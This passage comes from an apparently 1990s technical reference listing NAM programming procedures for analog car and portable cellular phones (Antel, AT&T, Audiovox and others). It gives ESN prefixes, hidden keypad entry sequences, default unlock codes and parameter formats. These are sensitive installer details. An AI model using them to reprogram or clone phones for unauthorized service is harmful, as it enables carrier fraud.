  ESN, S/N Match Required:  Yes
     Stamped Model Number:  100 series - LENEX 1
                            200 series - LENEX 2
       Available Channels:  832

     Programming Sequence:  Enter sequence:  04049 + FCN + FCN
                            ESN will be displayed
                            Press SEND to increment
                            Once Parameter has been entered, press SEND
                             to enter step and increment
                            Press END to stroe programmed data in NAM and
                             resume normal operation

                        # digits
               Area Code:  3     XXX + SEND
           Mobile Number:  7     XXX-XXXX + SEND
        System ID Format:  5     XXXXX + SEND
        Local Use Option:  1     1 + SEND
              MIN Option:  1     1 + SEND
  Initial Paging Channel:  4     0333 or 0334 + SEND
   Access Overload Class:  2     XX + SEND
        Preferred System:  1     0(B) or 1(A) + SEND
         Group ID Format:  2     XX + SEND
           Security Code:  4     XXXXX + SEND
               Handsfree:  1     0(Disable) + SEND or 1(Enable) + SEND
              Horn Alert:  1     0(Disable) + SEND or 1(Enable) + SEND
 Antonomous Registration:  1     0(Disable) + SEND or 1(Enable) + SEND
       Whereabouts Known:  1     0(Disable) + SEND or 1(Enable) + SEND
 One-minute Audible Beep:  1     0(Disable) + SEND or 1(Enable) + SEND

         Continuous Tone:  1     0(Disable) + SENd or 1(Enable) + SEND
               Dual NAME:  1     0(Disable) + SEND or 1(Enable) + SEND

(When Dual NAM is enable, it begins programming again for second NAM)

              Horn Alert:  FCN + 9
         New Unlock Code:  NAM
          Systyem Select:  FCN + 4 + * or # (to scroll choices)

      Selections include:  Preferred (AB or BA)
                           Altr only (Alternate only A only or B only)
                           Pref only (A only or B only)
                           Roam only (No Home operation)
                           Home only
                           Alternate (Altrernate AB or BA)

Press END to exit and Store Selections

                       ANTEL RADIANT 832 XL
                NAM Type:  Tri-State
            Manufacturer:  Antel
              Programmer:  Motorola 1801 -- Celnam, Bytek or Curtis
          ESN Prefix DEC:  178
                     HEX:  B2
 ESN, S/N match Required:  Yes
    Programmable Handset:  No
      Available Channels:  832

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX

              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Disabled (Enabled if Equipped)
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX

  Initial Paging Channel:  333 or 334
           Station Class:  08

        Hex Address     B7           B0
           13           0 0 0 0 0 0 0 0
           14           0 0 0 0 0 0 0 0
           15           0 0 0 0 0 0 0 0

        Hex Address 13
          B7 Disable 32 Digit Dial
          B2 Enable Special Lock

        Hex Address 14
          B7 to B4 Special Lock 1st Digit
          B3 to B0 Special Lock 2nd Digit

        Hex Address 15
          B7 to B4 Special Lock 1st Digit

                            ANTEL RADIANT 950
                NAM Type:  EEPROM
            Manufacturer:  Sun Moon Star
              Programmer:  Handset
          ESN Prefix DEC:  178
                     HEX:  B2
 ESN, S/N match Required:  Yes
      Available Channels:  Power On
                           Enter sequence FCN + FCN + * + 950626 + *
                           Software version will be displayed
                           Enter NAM number (1 to 4) within 5 seconds + VOL UP
                           Enter parameter for each step + # + VOL UP
                            (to increment)
                           To complete programming, press FCN + END

                       # digits
        System ID Format:  5     XXXXX + # + VOL UP
           Station Class:  2     08 (Preset) + VOL UP
           Mobile Number:  10    XXX-XXX-XXXX + # + VOL UP
  Initial Paging Channel:  3     333 or 334 + # + VOL UP
   Access Overload Class:  2     XX + # + VOL UP
         Group ID Format:  2     XX + # + VOL UP
             Lock Code A:  3     XXX + # + VOL UP
             Lock Code B:  3     XXX + # + VOL UP
        Local Use Option:  1     1 + # + VOL UP
              MIN Option:  1     1 + # + VOL UP
        Preferred System:  1     0(B) or 1(A) + # + VOL UP
   End-to-End Signalling:  1     1 + # + VOL UP
        Repertory Option:  1     1 + # + VOL UP
       Horn Alert Option:  1     1 + # + VOL UP
        Handsfree Option:  1     0(Disable) or 1(Enable) + # + VOL UP
        Full Lock Enable:  1     0(Disable) or 1(Enable) + # + VOL UP
         Enable Lock Mod:  1     1 + # + VOL UP
Enable Partial Lock Mode:  1     0(Disable) or 1(Enable) + # + VOL UP

Press FCN + END to exit program mode

                        ANTEL RADIANT 950MX
                NAM Type:  EEPROM
            Manufacturer:  Sun Moon Star
              Programmer:  Handset
          ESN Prefix DEC:  178
                     HEX:  B2
 ESN, S/N Match Required:  Yes
      Available Channels:  832
    Programming Sequence:  Power On
                           Enter programming mode: FCN + FCN + * + 950626 + *
                           Software version will be displayed
                           Press (up arrow) key to advance
                           Select NAM 1, 2, 3 oe 4, within 5 seconds
                           Use (up arrow) and (down arrow) keys to step
                            through parameters
                           Press # after entering each parameter to store info.
                           Once all information has been programmed, press
                            FCN + FCN to exit

                       # digits
        System ID Format:  5     XXXXX + #
           Station Class:  SCM 8 (should be displayed)
           Mobile Number:  10    XXX-XXX-XXXX + #
  Initial Paging Channel:  3     333 or 334 + #
   Access Overload Class:  2     XX + #
         Group ID Format:  2     XX + #
             Lock Code A:  3     XXX + #
             Lock Code B:  3     XXX + #
        Local Use Option:  1     1 + #
              MIN Option:  1     1 + #
        Preferred System:  1     0(B) or 1 (A) + #
   End-to-End Signalling:  1     1 + #
        Repertory Option:  1     1 + #
       Horn Alert Option:  1     1(Enable) or 0(Disable) + #
        Handsfree Option:  1     1(Enable) or 0(Disable) + #
        Full Lock Option:  1     1(Enable) or 0(Disable) + #
             Lock Option:  1     1(Enable) or 0(Disable) + #
     Partial Lock Option:  1     1(Enable) or o(Disable) + #

              Horn Alert:  FCN + 4 + 1
         New Unlock Code:  NAM
           System Select:  FCN + 5 + X
                            X=1  AB Pref A
                            X=2  BA Pref B
                            X=3  A only
                            X=4  B only
                            X=5  Home

Press CLR to exit.
            ANTEL STR 300, 350, 500, 550, 700, 770, 900 and 950
                NAM Type:  EEPROM
            Manufacturer:  Antel
              Programmer:  Handset
          ESN Prefix DEC:  146
                     HEX:  92
 ESN, S/N Match Required:  Yes

    Programming Sequence:  Enter sequence 04049 + FCN + FCN
                           ESN will be displayed
                           Once SEND to increment
                           Once parameter has been entered, press SEND
                            to enter step and increment
                           Press END to store programmed data in NAM and
                            resume normal operation

                       # digits
               Area Code:  3    XXX + SEND
           Mobile Number:  7     XXX-XXXX + SEND
        System ID Format:  5     XXXXX
        Local Use Option:  1     1 + SEND
              MIN Option:  1     1 + SEND
  Initial Paging Channel:  4     0333 or 0334 + SEND
   Access Overload Class:  2     XX + SEND
        Preferred System:  1     0(B) + 1(A) + SEND
         Group ID Format:  2     XX + SEND
           Security Code:  4     XXXXX + SEND
        Handsfree Option:  1     0(Disable) + SEND or 1(Enable) + SEND
       Horn Alert Option:  1     1 + SEND
 Autonomous Registration:  1    0(Disable) + SEND or 1(Enable) + SEND
       Whereabouts Known:  1     0(Disable) + SEND or 1(Enable) + SEND
 One minute Audible Beep:  1     0(Disable) + SEND or 1(Enable) + SEND
         Continuous Tone:  1     0(Disable) + SEND or 1(Enable) + SEND
                Dual NAM:  1     0(Disable) + SEND or 1(Enable) + SEND

(Dual NAM is enabled, programming begins again for second NAM)

              Horn Alert:  FCN + 9
         New Unlock Code:  NAM
           System Select:  FCN + 4 + * or # (to scroll options)
      Selections include:  Preferred (AB or BA)
                           Altr Only (Alternate Only, A only, or B Only)
                           Pref Only (A Only or B only)
                           Roam Only (No Home Operation)
                           Home Only
                           Alternat (Alternate, AB or BA)

Press END to exit and store selection.

                        ANTEL STR 1100 portable
                NAM Type:  EEPROM
            Manufacturer:  Sanyo
              Programmer:  Handset
          ESN Prefix DEC:  175
                     HEX:  AF
 ESN, S/N Match Required:  Yes (17500 + last 5 digits)
      Available Channels:  832

    Programming Sequence:  Enter sequence M(Mute) + 310# + 2567252
                            + RCL (must be entered within 10 seconds of power up)
                           ESN will be displayed
                           Press (up arrow) + (up arrow) to increment
                           Select NAM (1,2 or 3) + (up arrow)
                           NAM Prog Exists - Press 0 (to reselect NAM #) or
                            Press 1 to enter program mode + (up arrow)
                           Once each parameter has been entered, press
                            (up arrow) to enter step and increment
                           Press STO to store programmed data in NAM and END
                            to resume normal operation

                       # digits
           Mobile Number:  10    CLR + XXX-XXX-XXXX + (up arrow)
        System ID Format:  5     CLR + XXXXX + (up arrow)
        Local Use Option:  1     CLR + 1 + (up arrow)
              MIN Option:  1     CLR + 1 + (up arrow)
  Initial Paging Channel:  4     CLR + (0333 or 0334) + (up arrow)
   Access Overload Class:  2     CLR + XX + (up arrow)
        Preferred System:  1     CLR + 0(B) or 1(A) + (up arrow)
         Group ID Format:  2     CLR + XX + (up arrow)
             Unlock Code:  4     CLR + XXXX + (up arrow)
   End-to-End Signalling:  1     CLR + 1 + (up arrow)
              A/B Select:  1     CLR + 1 + (up arrow)
   NAM Program Area Code:  1     CLR + 1 + (up arrow)
     Discontinuous Trans:  1 CLR + (0 or 1) + 1 + (up arrow)

Press STO to store information and END to exit program mode.

         New Unlock Code:  NAM
           System Select:  FCN + 5 + 5 + 5, etc. (to scroll choices)
      Selections include:  Pref Only (A only or B only)
                           Standard (AB or BA)
                           Home Only
                           Alternate Only (BA or AB)

Press END to exit and store selection.

see GE CARFONE programming instructions

see OKI-400 series, handset programming instructions

                          AT&T 1100 and 1200
                NAM Type:  Tri-State
            Manufacturer:  Hitachi
              Programmer:  Motorola or Curtis
          ESN Prefix DEC:  132
                     HEX:  84
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX

              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled

        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX

  Initial Paging Channel:  333 or 334
           Station Class:  00

              Horn Alert:  HORN
         New Unlock Code:  NAM
           System Select:  NAM

                        AT&T 1300, 1300C and 1400
                NAM Type:  Tri-State
            Manufacturer:  Mitsubishi
              Programmer:  Curtis or Bytek
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

                   MIN 1:  XXX
                    Lock:  XXX
                   MIN 2: XXX
        System ID Format:  XXXX
       Horn Alert Option:  1
        Handsfree Option:  1 (if equipped)
   End-to-End Signalling:  1
         Group ID Format:  XX
   Access Overload Class:  XX
           Station Class:  0000
               Local Use:  1
  Initial Paging Channel:  333 or 334
        Preferred System:  1(A) or 0(B)

Manufacturer Options (for Curtis Programmer)
 33 Enable System Select:  1
         34 Roam Inhibit:  0

              Horn Alert:  HORN
         New Unlock Code:  NAM
           System Select:  When the manufacturer option, 33 above,
                           is enabled, the following sequence allows
                           system selection. This process must be
                           repeated each time the phone is turned on.

STORE + # + # + #, etc. (One of the following will appear)

        AAABBB or BBBAAA  Standard (AB or BA)
        BBBAAA or AAABBB  Alternate (BA or AB)
        CSOAAA or CSOBBB  Home
        AAAAAA or BBBBBB  Pref Only (A only or B only)
        BBBBBB or AAAAAA  Non-Pref Only (B only or A only)

Press CLEAR to exit

                            AT&T 1710 portable
see HITACHI CR-2111H

see Motorola Programming (Use Program Sequence 6)

                        AUDIOVOX BC-2 and CMT 125
                NAM Type:  Tri-State
            Manufacturer:  Shintom
              Programmer:  Bytek, Curtis or Motorola
          ESN Prefix DEC:  174
                     HEX:  AE
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
       Availble Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX

              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled

        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX

  Initial Paging Channel:  333 or 334
           Station Class:  00

    Manufacturer Options:
          Hex Address     B7           B0
              13          0 0 0 0 0 0 0 1
              14          0 0 0 0 0 0 0 0
              15          0 0 0 0 0 0 0 0
              16          0 0 0 0 0 0 0 0
              17          0 0 0 0 0 0 0 0
              18          0 0 0 0 0 0 0 0
              19          0 0 0 0 0 0 0 0
              1A          0 0 0 0 0 0 0 0
              1B          0 0 0 0 0 0 0 0

                Address 13 -- B0 Extended Digits
                              B3 Timer Beeper Tone

                Address 14 -- Horn Alert Safety Timer
                               B0   B1     Duration
                               0    0       2 hours
                               1    0       4 hours
                               0    1       6 hours
                               1    1       8 hours

                Address 18 -- Call Restriction Code - 1st two of three digits
                              B7 to B4 1st digit
                              B3 to B0 2nd digit

                Address 19 -- Call Restriction Code - 3rd of three digits
                              B7 to B4 3rd digit

                Address 1A -- Accumulated Timer Reset Code
                              1st two of three digits
                              B7 to B4 1st digit
                              B3 to B0 2nd digit

                Address 1B -- Accumulated Timer Reset Code
                              3rd of three digits
                              B7 to B4 3rd digits

      AUDIOVOX BC55, CMT 410, CTX 1500, 2500, 3100, 4000, 4100 and SP 85
                NAM Type:  EEPROM
            Manufacturer:  Toshiba
              Programmer:  Handset
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Programmable Handset:  Yes (requires current unlock code)
      Available Channels:  832

    Programming Sequence:  Power On (unlock current unlock code mode)
                           XXX + FUNC + # + 1   XXX=000 (new units)
                                                XXX=current unlock code
                           Enter each item, then press STO
                           # or * can be used to increment or decrement
                           FUNC + SND writes data in NAM
                           FUNC + CLR initialized phone

                        # digits
           Mobile Number:  10    XXX-XXX-XXXX
           Security Code:  3     XXX
        System ID Format:  5     XXXXX
   Access Overload Class:  2     XX
         Group ID Format:  2     XX
        Local Use Option:  1     1
              MIN Option:  1     1
  Initial Paging Channel:  4     0333 or 0334
        Preferred System:  1     0(B) or 1(A)
           Station Class:  4     1000
        Program Options1:  8     XXXXX000  (see options below)
        Program Options2:  8     XXXX0000  (see options below)
 Safety Timer (CTX-4000):  2     00 to 31 hours
 No Charge Airtime Delay:  3     000 to 255 seconds
   Call Timer Reset Code:  3     XXX
      Roam Inhibit Sys 1:  5     XXXXX
      Roam Inhibit Sys 2:  5     XXXXX
      Roam Inhibit Sys 3:  5     XXXXX
      Roam Inhibit Sys 4:  5     XXXXX
      Roam Inhibit Sys 5:  5     XXXXX
 Reserved for Future Use:  -     -----------

Program Options1:
         Audible Call Timer
         Auto Lock
         Auto Redial
         Call Restriction
         32-Digit Dialing
         Not used
         Not used
         Not used

Program Options2:
         End-to-End Signalling
         Repertory Dialing
         Horn Alert
         Not used
         Not used
         Not used
         Not used

              Horn Alert:  FCN + 2 + turn ignition off
         New Unlock Code:  NAM
           System Select:  Review - FUNC + 0 + 4 + FUNC + 0 + X
                                     X=0  Standard (AB or BA)
                                     X=1  Pref Only
                                     X=2  Home
                                     X=3  Non-Pref Only

(Roam inihibit specific System ID - NAM option)

  AUDIOVOX BC55A, CMT410A, CTR1900 transportable, CTX3100A, CTX4100A & SP85A
                NAM Type:  EEPROM
            Manufacturer:  Toshiba
              Programmer:  Handset
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No (see bar-graph label on transceiver)
    Programmable Handset:  Yes (requires current unlock code)
      Available Channels:  832

    Programming Sequence:  Power On (unlock current unlock code mode)
                           XXX + FUNC + # + 1   XXX=000 (new units)
                                                XXX=current unlock code
                           Enter each item, then press STO
                           # or * can be used to increment or decrement
                           FUNC + SND writes data in NAM
                           FUNC + CLR initialized phone and exits program mode

                        # digits
           Mobile Number:  10    XXX-XXX-XXXX + STO
           Security Code:  3     XXX + STO
        System ID Format:  5     XXXXX + STO
   Access Overload Class:  2     XX + STO
         Group ID Format:  2     XX + STO
        Local Use Option:  1     1 + STO
              MIN Option:  1     1 + STO
  Initial Paging Channel:  4     0333 or 0334 + STO
        Preferred System:  1     0(B) or 1(A) + STO
           Station Class:  4     1000 + STO
        Program Options1:  8     XXXXX000 + STO (see options below)
        Program Options2:  8     XXXX0000 + STO (see options below)
            Safety Timer:  2     00 to 31 hours + STO
 No Charge Airtime Delay:  3     000 to 255 seconds + STO
   Call Timer Reset Code:  3     XXX + STO
      Roam Inhibit Sys 1:  5     XXXXX + STO
      Roam Inhibit Sys 2:  5     XXXXX + STO
      Roam Inhibit Sys 3:  5     XXXXX + STO
      Roam Inhibit Sys 4:  5     XXXXX + STO
      Roam Inhibit Sys 5:  5     XXXXX + STO
 Reserved for Future Use:  -     -----------

Program Options1:
         Audible Call Timer
         Auto Lock
         Auto Redial
         Call Restriction
         32-Digit Dialing
         Not used
         Not used
         Not used

Program Options2:
         End-to-End Signalling
         Repertory Dialing
         Horn Alert
         Not used
         Not used
         Not used
         Not used

              Horn Alert:  FCN + 2 + turn ignition off
         New Unlock Code:  NAM
           System Select:  Review - FUNC + 0 + 4
                              Set - FUNC + 0 + X
                                     X=0  Standard (AB or BA)
                                     X=1  Pref Only
                                     X=2  Home
                                     X=3  Non-Pref Only

  AUDIOVOX CMT300 (BMW), CTX3200A, CTRX4200A, 832CO, C1000, CTR2000 & TCT400
                NAM Type:  EEPROM
            Manufacturer:  Toshiba
              Programmer:  Handset
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No (see bar-graph label on transceiver)
    Stamped Model Number:  CMT300, CTX3200A, 832CO, CTR2000, C1000, 3200A
                           CTX4200A, 4200A
      Available Channels:  832

    Programming Sequence:  Power On (unlock if phone is in lock mode)
                           XXX + FUNC + # + 1  XXX=000 (new units)
                                               XXX=current unlock code
                           Enter each item, then press STO
                           Press # or * to increment or decrement
                           FUNC + SND writes data in NAM
                           FUNC + CLR initializes phone and exits program mode

If the current unlock code doesn't allow program access, the phone may have
been programmed with an activation code (see last step)
If this is the case, the phone must be returned to the factory for programming.

           Mobile Number:  10    XXX-XXX-XXXX + STO
           Security Code:  3     XXX + STO
        System ID Format:  5     XXXXX + STO
   Access Overload Class:  2     XX + STO
         Group ID Format:  2     XX + STO
       Local Use Options:  1     1 + STO
              MIN Option:  1     1 + STO
  Initial Paging Channel:  4     0333 or 0334 + STO
        Preferred System:  1     0(B) or 1(A) + STO
           Station Class:  4     1000 + STO
        Program Options1:  8     XXXXX000 + STO
        Program Options2:  8     XXXXX000 + STO
            Safety Timer:  2     00 to 31 hours + STO
 No Charge Airtime Delay:  3     0000 to 255 seconds + STO
   Call Timer Reset Code:  3     XXX + STO
      Roam Inhibit Sys 1:  5     XXXXX + STO
   Roam Inhibit Sys 2-25:  5     XXXXX + STO
      NAM Reprogram Code:  5     XXXXX + STO
         Activation Code:  7     XXXXXXX + STO

        Program Options1:
                 Audible Call Timer
                 Auto Lock
                 Auto Redial
                 Call Restriction
                 32-Digit Dialing
                 Not used
                 Not used
                 Not used

        Program Options2:
                 End-to-End Signalling
                 Repertory Dialing
                 Horn Alert
                 911 Dial
                 Not used
                 Not used
                 Not used

              Horn Alert:  FCN + 2 + turn ignition off
         New Unlock Code:  NAM
           System Select:  Review - FUNC + 0 + 4
                              Set - FUNC + 0 + X
                                     X=0  Standard (AB or BA)
                                     X=1  Pref Only
                                     X=2  Home
                                     X=3  Non-Pref Only

                          AUDIOVOX CMT-500
                NAM Type:  Tri-State
            Manufacturer:  Toshiba
              Programmer:  Motorola, Curtis or Bytek
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
         Hansfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

    Manufacturer Options:
         Hex Address     B7           B0
              13         0 0 0 0 0 0 1 1
              14         0 0 0 0 0 0 0 0
              15         0 0 0 0 0 0 0 0
              16         0 0 0 0 0 0 0 0
              17         0 0 0 0 0 0 0 0
              18         0 0 0 0 0 0 0 0
              19         0 0 0 0 0 0 0 0
              1A         0 0 0 0 0 0 0 0
              1B         X X X X X X X X
              1C         X X X X 0 0 0 0

                    Address 13 -- B0  Call Timer
                                  B1  A/B Switch
                    Address 1B -- B4-B7  Call Timer Clear Code 1st Digit
                                  B0-B3  Call Timer Clear Code 2nd Digit
                    Address 1C -- B4-B7  Call Timer Clear Code 3rd Digit

                            AUDIOVOX SMT-1000
                NAM Type:  Tri-State
            Manufacturer:  Toshiba
              Programmer:  Motorola, Curtis, or Bytek
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

              Horn Alert:  HORN
         New Unlock Code:  NAM
           System Select:  NAM (AB or BA only)

                           AUDIOVOX CMT-3000
                NAM Type:  Tri-State
            Manufacturer:  Toshiba
              Programmer:  Motorola, Curtis, or Bytek
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

    Manufacturer Options:
         Hex Address    B7           B0
              13        0 0 0 0 0 0 0 1
              14        0 0 0 0 0 0 0 0
              15        0 0 0 0 0 0 0 0
              16        0 0 0 0 0 0 0 0
              17        0 0 0 0 0 0 0 0
              18        0 0 0 0 0 0 0 0
              19        0 0 0 0 0 0 0 0
              1A        0 0 0 0 0 0 0 0
              1B        X X X X X X X X
              1C        X X X X 0 0 0 0

                 Address 13 -- B0  Call Timer
                 Address 1B -- B4-B7  Call Timer Clear Code 1st Digit
                               B0-B3  Call Timer Clear Code 2nd Digit
                 Address 1C -- B4-B7  Call Timer Clear Code 3rd Digit

            Horn Alert: HORN ALERT + Turn ignition off
       New Unlock Code:  NAM
         System Select:  n/a

                  AUDIOVIX CTX-4500 and CTX-5000 portable
                NAM Type:  EEPROM
            Manufacturer:  Toshiba
              Programmer:  Handset
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Stamped Model Number:  CTX-5000
    Programmable Handset:  Yes (requires current unlock code)
      Available Channels:  832

    Programming Sequence:  Power On (unlock current unlock code mode)
                           XXX + FUNC + # + 1   XXX=000 (new units)
                                                XXX=current unlock code
                           Enter each item, then press STO
                           # or * can be used to increment or decrement
                           FUNC + SND writes data in NAM
                           FUNC + CLR initialized phone and exits program mode

                        # digits
           Mobile Number:  10    XXX-XXX-XXXX + STO
           Security Code:  3     XXX + STO
        System ID Format:  5     XXXXX + STO
   Access Overload Class:  2     XX + STO
         Group ID Format:  2     XX + STO
        Local Use Option:  1     1 + STO
              MIN Option:  1     1 + STO
  Initial Paging Channel:  4     0333 or 0334 + STO
        Preferred System:  1     0(B) or 1(A) + STO
           Station Class:  4     1000 + STO
        Program Options1:  8     XXXXX000 + STO (see options below)
        Program Options2:  8     XXXX0000 + STO (see options below)
            Safety Timer:  2     00 to 31 hours + STO
 No Charge Airtime Delay:  3     000 to 255 seconds + STO
   Call Timer Reset Code:  3     XXX + STO
      Roam Inhibit Sys 1:  5     XXXXX + STO
      Roam Inhibit Sys 2:  5     XXXXX + STO
      Roam Inhibit Sys 3:  5     XXXXX + STO
      Roam Inhibit Sys 4:  5     XXXXX + STO
      Roam Inhibit Sys 5:  5     XXXXX + STO
 Reserved for Future Use:  -     -----------

Program Options1:
         Audible Call Timer
         Auto Lock
         Auto Redial
         Call Restriction
         32-Digit Dialing
         Not used
         Not used
         Not used

Program Options2:
         End-to-End Signalling
         Repertory Dialing
         Horn Alert
         Not used
         Not used
         Not used
         Not used

              Horn Alert:  FCN + 2 + turn ignition off
         New Unlock Code:  NAM
           System Select:  Review - FUNC + 0 + 4
                              Set - FUNC + 0 + X
                                     X=0  Standard (AB or BA)
                                     X=1  Pref Only
                                     X=2  Home
                                     X=3  Non-Pref Only

                        AUDIOVOX MVX 500 portable
                NAM Type:  EPROM
            Manufacturer:  Toshiba
              Programmer:  Handset
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Stamped Model Number:  MVX 500
      Available Channels:  832

    Programming Sequence:  Power On (unlock current unlock code mode)
                           XXX + FUNC + # + 1   XXX=000 (new units)
                                                XXX=current unlock code
                           Enter each item, then press STO
                           # or * can be used to increment or decrement
                           FUNC + SND writes data in NAM
                           FUNC + CLR initialized phone and exits program mode

                        # digits
           Mobile Number:  10    XXX-XXX-XXXX + STO
           Security Code:  3     XXX + STO
        System ID Format:  5     XXXXX + STO
   Access Overload Class:  2     XX + STO
         Group ID Format:  2     XX + STO
        Local Use Option:  1     1 + STO
              MIN Option:  1     1 + STO
  Initial Paging Channel:  4     0333 or 0334 + STO
        Preferred System:  1     0(B) or 1(A) + STO
           Station Class:  4     1000 + STO
        Program Options1:  8     XXXXX0XX + STO (see options below)
        Program Options2:  8     XXX0X000 + STO (see options below)
            Safety Timer:  2     00 to 31 hours + STO
 No Charge Airtime Delay:  3     000 to 255 seconds + STO
   Call Timer Reset Code:  3     XXX + STO
      Roam Inhibit Sys 1:  5     XXXXX + STO
      Roam Inhibit Sys 2:  5     XXXXX + STO
      Roam Inhibit Sys 3:  5     XXXXX + STO
      Roam Inhibit Sys 4:  5     XXXXX + STO
      Roam Inhibit Sys 5:  5     XXXXX + STO
 Reserved for Future Use:  -     -----------

Program Options1:
         Audible Call Timer
         Auto Lock
         Auto Redial
         Call Restriction
         32-Digit Dialing - 0=16 digits, 1=32 digits
         Not used
         Data Auto Answer
         Any Dial Answer

Program Options2:
         End-to-End Signalling
         Repertory Dialing
         Not used
         911 Dial
         Not used
         Not used
         Not used

              Horn Alert:  FCN + 2 + turn ignition off
         New Unlock Code:  NAM
           System Select:  Review - FUNC + 0 + 4
                              Set - FUNC + 0 + X
                                     X=0  Standard (AB or BA)
                                     X=1  Pref Only
                                     X=2  Home
                                     X=3  Non-Pref Only

                        AUDIOVOX PT300 portable
                NAM Type:  EEPROM
            Manufacturer:  Toshiba
              Programmer:  Handset
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Programmable Handset:  Yes (requires current unlock code)
      Available Channels:  832

    Programming Sequence:  Power On (unlock current unlock code mode)
                           XXX + FUNC + # + 1   XXX=000 (new units)
                                                XXX=current unlock code
                           Enter each item, then press STO
                           # or * can be used to increment or decrement
                           FUNC + SND writes data in NAM
                           FUNC + CLR initialized phone and exits program mode

                        # digits
           Mobile Number:  10    XXX-XXX-XXXX + STO + #
           Security Code:  3     XXX + STO + #
        System ID Format:  5     XXXXX + STO + #
   Access Overload Class:  2     XX + STO + #
         Group ID Format:  2     XX + STO + #
        Local Use Option:  1     1 + STO + #
              MIN Option:  1     1 + STO + #
  Initial Paging Channel:  4     0333 or 0334 + STO + #
        Preferred System:  1     0(B) or 1(A) + STO + #
           Station Class:  4     1010 (binary) or 10 (dec) + STO + #
        Program Options1:  8     XXXXX000 + STO + # (see options below)
        Program Options2:  8     XXXX0000 + STO + # (see options below)
            Safety Timer:  2     00 to 31 hours + STO + #
 No Charge Airtime Delay:  3     000 to 255 seconds + STO + #
   Call Timer Reset Code:  3     XXX + STO + #
      Roam Inhibit Sys 1:  5     XXXXX + STO + #
      Roam Inhibit Sys 2:  5     XXXXX + STO + #
      Roam Inhibit Sys 3:  5     XXXXX + STO + #
      Roam Inhibit Sys 4:  5     XXXXX + STO + #
      Roam Inhibit Sys 5:  5     XXXXX + STO + #
      Roam Inhibit Sys 6:  5     XXXXX + STO + #
      Roam Inhibit Sys 7:  5     XXXXX + STO + #
      Roam Inhibit Sys 8:  5     XXXXX + STO + #
      Roam Inhibit Sys 9:  5     XXXXX + STO + #
     Roam Inhibit Sys 10:  5     XXXXX + STO + #

Program Options1:
         Audible Call Timer
         Auto Lock
         Auto Redial
         Call Restriction
         32-Digit Dialing - 0=16 digits, 1=32 digits
         Not used
         Not used
         Not used

Program Options2:
         End-to-End Signalling
         Repertory Dialing
         911 Dial
         Not used
         Not used
         Not used
         Not used

              Horn Alert:  FCN + 2 + turn ignition off
         New Unlock Code:  NAM
           System Select:  Review - FUNC + 0 + 4
                              Set - FUNC + 0 + X
                                     X=0  Standard (AB or BA)
                                     X=1  Pref Only
                                     X=2  Home
                                     X=3  Non-Pref Only

                                 BENTLEY BX7
see NOVATEL 8320 for programming instructions

                            BLAUPUNKT MT 8000AU

                       BLAUPUNKT MT9000 and MT9000P
see PANASONIC 6106/6110

                       BLAUPUNKT MT9010 and MT9010P
see Motorola handset programming instructions. Use programming sequence
 number 6.

              Horn Alert:  FCN + 4
         New Unlock Code:  FCN + 6-digit security code + new 3-digit
                           Unlock Code + #
           System Select:  RCL/STO + repeatedly press *
                           (One of the following prompts will appear)
                           STD AB or STD BA    (Standard)
                           SCAN BA or SCAN AB  (Alternate)
                           SCAN A
                           SCAN B
                           Press # to enter selection.

                          CHRYSLER VISORPHONE
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Keypad
          ESN Prefix DEC:  129
                     HEX:  81
